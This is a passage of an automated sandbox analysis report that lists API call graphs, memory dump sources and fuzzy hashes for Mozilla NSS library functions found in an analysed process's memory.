                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a6552c5c93684acc6b4352eac8ec18c764147572bfc126864bb6c749cdd150ae
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5261A071A00705AFDB14CF65DC94FAA7BB1FB49314F10812CE915ABB80EB31AD06CB95
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_GetMonitorEntryCount.NSS3(?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6C4E7FB2
                                                                                                                                                                                                                                                        • Part of subcall function 6C46BA40: TlsGetValue.KERNEL32 ref: 6C46BA51
                                                                                                                                                                                                                                                        • Part of subcall function 6C46BA40: TlsGetValue.KERNEL32 ref: 6C46BA6B
                                                                                                                                                                                                                                                        • Part of subcall function 6C46BA40: EnterCriticalSection.KERNEL32 ref: 6C46BA83
                                                                                                                                                                                                                                                        • Part of subcall function 6C46BA40: TlsGetValue.KERNEL32 ref: 6C46BAA1
                                                                                                                                                                                                                                                        • Part of subcall function 6C46BA40: _PR_MD_UNLOCK.NSS3 ref: 6C46BAC0
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?,?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6C4E7FD4
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4E9430: PR_SetError.NSS3(FFFFD0AC,00000000), ref: 6C4E9466
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C4E801B
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C4E8034
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4E80A2
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C4E80C0
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C4E811C
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C4E8134
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$Monitor$Enter$CriticalExitSection$Error$CountEntryLeave
                                                                                                                                                                                                                                                      • String ID: )
                                                                                                                                                                                                                                                      • API String ID: 3537756449-2427484129
                                                                                                                                                                                                                                                      • Opcode ID: 7ca2fec3ce1fb7148dfd02bcd1a9cec299979b1f8e722e87bda68d68e89bb960
                                                                                                                                                                                                                                                      • Instruction ID: 57eb9e410817098d8eee4ef69d836629d150dc809857a5d65e39993648fdaa8d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ca2fec3ce1fb7148dfd02bcd1a9cec299979b1f8e722e87bda68d68e89bb960
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C511971A047049BEB11DB389C01FEBB7B0AF5A31EF06052DD95956B42E731A909C792
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6C48FCBD
                                                                                                                                                                                                                                                      • strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6C48FCCC
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6C48FCEF
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C48FD32
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6C48FD46
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000001), ref: 6C48FD51
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6C48FD6D
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C48FD84
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
                                                                                                                                                                                                                                                      • String ID: :
                                                                                                                                                                                                                                                      • API String ID: 183580322-336475711
                                                                                                                                                                                                                                                      • Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                                                                      • Instruction ID: 91b7e9e58499c9b08f27662ba53e48f224bfa92b53b57ed46471695e462ab7f1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE31B3B6A032159BFB01CAA49C05FAF77F8AF44319F150128DD15A7B00E7B1EA09C7D2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C470F62
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C470F84
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,6C48F59B,6C59890C,?), ref: 6C470FA8
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C470FC1
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C470FDB
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C470FEF
                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6C471001
                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6C471009
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
                                                                                                                                                                                                                                                      • String ID: security
                                                                                                                                                                                                                                                      • API String ID: 2061345354-3315324353
                                                                                                                                                                                                                                                      • Opcode ID: 4f955fa416b966a6b7c5eae195409bcfd94d74ee1fe2483714fe6a8b8c2d8756
                                                                                                                                                                                                                                                      • Instruction ID: cd2ef703a75af7cc390d416ada0769d91535c70556cc1c0beb19303859c8eecb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f955fa416b966a6b7c5eae195409bcfd94d74ee1fe2483714fe6a8b8c2d8756
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3721E1B1904344AAE710EF24DC41EEA77B8EF44259F018919FC189A701F732A906CBE2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECITEM_ArenaDupItem_Util.NSS3(?,6C477D8F,6C477D8F,?,?), ref: 6C476DC8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C4CFE08
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C4CFE1D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C4CFE62
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C477D8F,?,?), ref: 6C476DD5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C598FA0,00000000,?,?,?,?,6C477D8F,?,?), ref: 6C476DF7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                                                      • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C476E35
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C4CFE29
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C4CFE3D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C4CFE6F
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C476E4C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D116E
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C598FE0,00000000), ref: 6C476E82
                                                                                                                                                                                                                                                        • Part of subcall function 6C476AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C47B21D,00000000,00000000,6C47B219,?,6C476BFB,00000000,?,00000000,00000000,?,?,?,6C47B21D), ref: 6C476B01
                                                                                                                                                                                                                                                        • Part of subcall function 6C476AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C476B8A
                                                                                                                                                                                                                                                      • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C476F1E
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C476F35
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C598FE0,00000000), ref: 6C476F6B
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000,6C477D8F,?,?), ref: 6C476FE1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 587344769-0
                                                                                                                                                                                                                                                      • Opcode ID: 4c48124bcf43919a323236c3f8ae43798647fcfef99f2ac91427e61daffe9687
                                                                                                                                                                                                                                                      • Instruction ID: 0fe247ac02f9263485040941d74ddfb011d7347939321039eb5be1848be25b8e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c48124bcf43919a323236c3f8ae43798647fcfef99f2ac91427e61daffe9687
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF716D71E106469BEB10CF65CD40FEABBB5BF95308F154229E808D7B11E770EA94CBA1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4B1057
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4B1085
                                                                                                                                                                                                                                                      • PK11_GetAllTokens.NSS3 ref: 6C4B10B1
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4B1107
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4B1172
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4B1182
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4B11A6
                                                                                                                                                                                                                                                      • SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C4B11C5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B52C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C48EAC5,00000001), ref: 6C4B52DF
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B52C0: EnterCriticalSection.KERNEL32(?), ref: 6C4B52F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B52C0: PR_Unlock.NSS3(?), ref: 6C4B5358
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C4B11D3
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C4B11F3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1549229083-0
                                                                                                                                                                                                                                                      • Opcode ID: 60c26b1fcfc869f859ffb4e61f25aa072b7ddc197a32db3664ca6451324c8141
                                                                                                                                                                                                                                                      • Instruction ID: d6707033fdee83706fb600886072264aeeede3056d45eba3eab3fd4dc1cdf00c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60c26b1fcfc869f859ffb4e61f25aa072b7ddc197a32db3664ca6451324c8141
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 436170B4E013459BEB00DF68DC85FAEB7B5AF48348F154128E819BB741EB31E945CBA1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE10
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE24
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,6C49D079,00000000,00000001), ref: 6C4BAE5A
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE6F
                                                                                                                                                                                                                                                      • free.MOZGLUE(85145F8B,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE7F
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEB1
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEC9
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEF1
                                                                                                                                                                                                                                                      • free.MOZGLUE(6C49CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C49CDBB,?), ref: 6C4BAF0B
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAF30
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 161582014-0
                                                                                                                                                                                                                                                      • Opcode ID: 55980e2b6ce546cabeb08cba0a9964858f1cf0bfd8921e9fab2c7f4b5258255c
                                                                                                                                                                                                                                                      • Instruction ID: 05a5371851abd9097696b3478568f419cec27d16e6b3231ad0e20b5d94c90a5b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55980e2b6ce546cabeb08cba0a9964858f1cf0bfd8921e9fab2c7f4b5258255c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15516CB5A01A01ABDB01DF29D884F5AB7B4BF05319F144668E818ABF11E731F964CBE1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C49AB7F,?,00000000,?), ref: 6C494CB4
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0000001C,?,6C49AB7F,?,00000000,?), ref: 6C494CC8
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,6C49AB7F,?,00000000,?), ref: 6C494CE0
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,6C49AB7F,?,00000000,?), ref: 6C494CF4
                                                                                                                                                                                                                                                      • PL_HashTableLookup.NSS3(?,?,?,6C49AB7F,?,00000000,?), ref: 6C494D03
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,00000000,?), ref: 6C494D10
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                                                      • PR_Now.NSS3(?,00000000,?), ref: 6C494D26
                                                                                                                                                                                                                                                        • Part of subcall function 6C539DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DC6
                                                                                                                                                                                                                                                        • Part of subcall function 6C539DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DD1
                                                                                                                                                                                                                                                        • Part of subcall function 6C539DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C539DED
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C494D98
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C494DDA
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C494E02
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4032354334-0
                                                                                                                                                                                                                                                      • Opcode ID: ad6743c83d7e718c9af763820db3913bbc4b63f19d478c064bce7fd92d582288
                                                                                                                                                                                                                                                      • Instruction ID: dbc52544bf2e53cf3879094097ce7b25eaf0618f0e20efed686690dcee077d6e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad6743c83d7e718c9af763820db3913bbc4b63f19d478c064bce7fd92d582288
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E41E7B9A006119BEB01EF28EC44D667BB8BF1525DF055274EC1987B21FB31E914C7E1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C47BFFB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000018C), ref: 6C47C015
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(-00000004,00000000,00000188), ref: 6C47C032
                                                                                                                                                                                                                                                      • DER_SetUInteger.NSS3(00000000,00000078,00000000), ref: 6C47C04D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C69E0: PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C4C6A47
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C69E0: memcpy.VCRUNTIME140(00000000,-00000005,00000001), ref: 6C4C6A64
                                                                                                                                                                                                                                                      • DER_SetUInteger.NSS3(00000000,00000084,?), ref: 6C47C064
                                                                                                                                                                                                                                                      • CERT_CopyName.NSS3(00000000,000000A8,?), ref: 6C47C07B
                                                                                                                                                                                                                                                        • Part of subcall function 6C478980: PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,6C477310), ref: 6C4789B8
                                                                                                                                                                                                                                                        • Part of subcall function 6C478980: PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,6C477310), ref: 6C4789E6
